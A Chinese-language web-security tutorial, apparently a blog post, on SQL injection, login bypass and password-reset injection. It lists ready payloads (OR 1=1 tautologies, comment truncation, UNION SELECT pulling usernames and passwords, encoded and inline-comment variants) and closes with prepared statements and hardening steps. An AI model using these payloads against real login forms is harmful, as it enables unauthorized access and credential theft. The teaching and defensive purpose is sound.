【web安全】SQL注入与认证绕过

目录

一、SQL注入漏洞

[1.1 基础注入原理](#1.1 基础注入原理)

[1.2 实用注入Payload分类](#1.2 实用注入Payload分类)

逻辑绕过型

注释截断型

联合查询型

常见的万能密码-CSDN博客

二、登录绕过实战技巧

[2.1 基础绕过手法](#2.1 基础绕过手法)

[2.2 高级绕过技巧](#2.2 高级绕过技巧)

编码绕过

多重注释

参数污染

三、密码重置漏洞利用

[3.1 常见漏洞模式](#3.1 常见漏洞模式)

[3.2 实用Payload](#3.2 实用Payload)

四、防御方案精要

[4.1 开发防护](#4.1 开发防护)

[4.2 运维加固](#4.2 运维加固)

速查表


一、SQL注入漏洞

1.1 基础注入原理

SQL注入是通过构造特殊输入改变原始SQL语句逻辑的攻击方式。典型攻击模式:

sql 复制代码
原始语句:SELECT * FROM users WHERE username='[输入]' AND password='[输入]'
注入后: SELECT * FROM users WHERE username='admin'--' AND password='xxx'

1.2 实用注入Payload分类

逻辑绕过型
sql 复制代码
' OR 1=1 --
" OR "a"="a
' OR '1'='1
注释截断型
sql 复制代码
admin'#
admin'/*
admin'--
联合查询型
sql 复制代码
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--

常见的万能密码-CSDN博客

二、登录绕过实战技巧

2.1 基础绕过手法

sql 复制代码
admin' OR '1'='1
admin'--
admin'/*

2.2 高级绕过技巧

编码绕过
sql 复制代码
admin%27%20OR%201%3D1--
多重注释
sql 复制代码
admin'/*!OR*/1=1--
参数污染
sql 复制代码
username=admin'--&username=realuser

三、密码重置漏洞利用

3.1 常见漏洞模式

sql 复制代码
UPDATE users SET password='[新密码]' WHERE username='[输入]'
注入: UPDATE users SET password='hacked' WHERE username='admin'--'

3.2 实用Payload

sql 复制代码
admin'--
' OR email='admin@example.com
' OR 1=1 LIMIT 1--

四、防御方案精要

4.1 开发防护

sql 复制代码
// 使用预编译语句
String sql = "SELECT * FROM users WHERE username=?";
PreparedStatement stmt = conn.prepareStatement(sql);
stmt.setString(1, username);

4.2 运维加固

  1. 启用WAF规则过滤特殊字符

  2. 限制数据库账号权限

  3. 开启SQL执行日志审计

相关推荐
tntxia14 小时前
网络安全漏洞修复(一)
安全
泯泷2 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
唐青枫6 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
Flynt7 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
掉头发的王富贵7 天前
【StarRocks】极限十分钟入门StarRocks
数据库·sql·mysql
冬奇Lab11 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
zzzzzz31013 天前
9K Star 炸裂开源!这个 C 语言写的代码知识图谱,把 Linux 内核索引压缩到了 3 分钟
linux·服务器·sql
Aphasia31114 天前
VPN 与内网穿透
安全
云技纵横14 天前
唯一索引 INSERT 死锁实战:5 秒复现交叉插入的 S 锁循环等待
sql·mysql